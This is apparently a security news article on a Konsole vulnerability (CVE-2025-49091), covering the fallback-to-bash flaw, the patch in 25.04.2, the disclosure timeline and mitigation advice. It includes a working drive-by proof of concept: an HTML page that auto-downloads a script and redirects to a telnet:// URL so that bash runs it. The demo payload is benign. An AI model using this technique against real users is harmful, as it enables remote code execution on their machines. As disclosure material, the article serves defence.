KDE Konsole Terminal Emulator Flaw Allows Remote Code Execution Through Malicious Website URLs

A recently disclosed vulnerability (CVE-2025-49091) in Konsole, KDE’s flagship terminal emulator, enables remote code execution (RCE) via specially crafted URL schemes when combined with KTelnetService and missing standard network utilities.

The issue, fixed in Konsole 25.04.2, highlights the importance of robust scheme handler validation and the risks of automation in command fallbacks.

Technical Background and Exploitation Vector

The vulnerability leverages KDE Konsole’s handling of command-line arguments when a network utility is missing—specifically, telnet, rlogin, or ssh. Under default conditions in certain KDE desktop environments (notably Fedora KDE Plasma Desktop 42), these utilities are not installed. If a user allows their web browser to open a telnet://, rlogin://, or ssh:// URL, KTelnetService invokes Konsole to handle the request.

Default KTelnetService desktop entry:

text[Desktop Entry]
Type=Application
Exec=ktelnetservice6 %u
Icon=utilities-terminal
MimeType=x-scheme-handler/telnet;x-scheme-handler/rlogin;x-scheme-handler/ssh;
NoDisplay=true
Name=KTelnetService
...

When a browser encounters a scheme (like telnet://), it queries the system for the handler, typically prompting the user:

“Allow this site to open the telnet link with KTelnetService?”

If accepted, KTelnetService executes a command like:

bash/usr/bin/konsole --noclose -e telnet /proc/self/cwd/Downloads/evil

The critical flaw arises if telnet is missing. Konsole tries to execute the requested command but instead falls back to /bin/bash, passing the original argument:

bash/bin/bash /proc/self/cwd/Downloads/evil

This effectively executes any script downloaded to the specified location.

Attack Scenario and Proof of Concept

Step-by-step exploitation:

1. User visits a malicious website containing a script that downloads a payload and redirects to a special URL.xml<html> <head> <script type="text/javascript"> function downloadAndRedirect() { const anchor = document.createElement('a'); anchor.href = "data:;base64,ZWNobyAiSGVsbG8gd29ybGQiCnRvdWNoIC90bXAvZm9vYmFyCg=="; anchor.download = 'evil'; document.body.appendChild(anchor); anchor.click(); document.body.removeChild(anchor); setTimeout(() => { window.location.href = "telnet:///proc/self/cwd/Downloads/evil"; }, 1000); } </script> </head> <body onload="downloadAndRedirect()"> </body> </html>
2. The script downloads a file (evil) with the following contents:bashecho "Hello world" touch /tmp/foobar
3. The browser redirects to:texttelnet:///proc/self/cwd/Downloads/evil If the user accepts the prompt, Konsole attempts to execute:bashtelnet /proc/self/cwd/Downloads/evil Since telnet is missing, Konsole falls back to:bash/bin/bash /proc/self/cwd/Downloads/evil
4. The script executes, logging “Hello world” and creating /tmp/foobar:textWarning: Could not find 'telnet', starting '/bin/bash' instead. Please check your profile settings. Hello world

This demonstrates arbitrary code execution by merely allowing a website to open a nonstandard URL in a vulnerable setup.

The Fix and Responsible Disclosure

The vulnerability was patched in Konsole 25.04.2 by clearing command-line arguments when the requested command (e.g., telnet) is not found.

This ensures that only /bin/bash (or another fallback shell) is executed without arguments, mitigating the risk of script execution.

Commit responsible for the fix:
09d20dea

Timeline:

• 2025-04-16: Issue reported to security@kde.org; acknowledged the same day.
• 2025-05-12: KDE security team confirmed the exploit and announced fixes in preparation.
• 2025-06-05: The team notified reporters that the fix was complete and would be publicly disclosed.
• 2025-06-09: KDE Security Advisory published.
• 2025-06-10: Public write-up released.

Security Recommendations

To mitigate risks:

• Update Konsole to version 25.04.2 or newer.
• Be cautious when prompted by browsers to open external applications via non-standard URLs.
• Review and restrict scheme handler registrations on critical systems.
• Educate users about the dangers of allowing websites to open external applications.

This incident underscores the dangers of automatic command fallback and the importance of secure handling of external protocol requests in desktop environments.